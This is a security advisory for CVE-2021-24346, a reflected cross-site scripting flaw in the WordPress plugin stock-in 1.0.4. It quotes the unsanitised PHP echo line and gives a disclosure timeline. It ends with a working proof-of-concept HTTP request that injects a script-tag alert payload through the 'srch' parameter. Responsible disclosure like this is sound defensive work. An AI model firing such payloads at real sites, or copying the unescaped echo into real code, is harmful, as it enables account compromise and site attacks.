wp-plugin : stock-in | Code Vigilant : to err is human.. To fix is Humanity

Wp Plugin Stock In

Plugin Details

Plugin Name: wp-plugin : stock-in

Effected Version : 1.0.4 (and most probably lower version's if any)

Vulnerability : Cross-Site Scripting (XSS)

Minimum Level of Access Required : Contributor

CVE Number : CVE-2021-24346

Identified by : Shreya Pohekar

WPScan Reference URL

Disclosure Timeline

April 28, 2021: Issue Identified and Disclosed to WPScan
April 29, 2021 : Plugin Closed
May 24, 2021 : CVE Assigned
May 27, 2021 : Public Disclosure

Technical Details

The plugin has a search functionality with Contributor role as the lowest access level takes in POST parameter srch. The parameter is passed into echo statement without proper sanitization, validation or escaping therefore leads to reflected XSS.

Vulnerable File: includes/settings.php

Vulnerable Code: settings.php#L118

117        $search = $_POST['srch'];
118	   echo 'Showing Results for "'. $search .'"';

PoC Screenshot

Exploit

POST /wp-admin/admin.php?page=stock_in HTTP/1.1
Host: 172.28.128.50
Content-Length: 66
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/admin.php?page=stock_in
Accept-Language: en-US,en;q=0.9
Cookie: wp-saving-post=9-check; spf-last-metabox-tab-12-_sptp_generator=_sptp_generator_1; spf-last-metabox-tab-14-_sptp_generator=_sptp_generator_1; wordpress_232395f24f6cff47569f2739c21385d6=contributor%7C1619547357%7CBTyRvctkKFcBVOKgwq7cnRkycNiIpHJch2IksOTCAxB%7C6bcf7335fe271c00e443d3210b6da18e2e9ce2a14b4306f45c99b2c640e83b1a; __eucookielaw=true; giveasap_110=5852970951c80fcaa281efebddaaf1b3; _ga=GA1.1.436418670.1617784311; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1619288085; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=contributor%7C1619547357%7CBTyRvctkKFcBVOKgwq7cnRkycNiIpHJch2IksOTCAxB%7Cd7d2d7515610bca092071e9a9154614a218be9fb52f1e0dcc65e73dcc537259e; wp-settings-time-5=1619374561
Connection: close

srch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search=Search+Product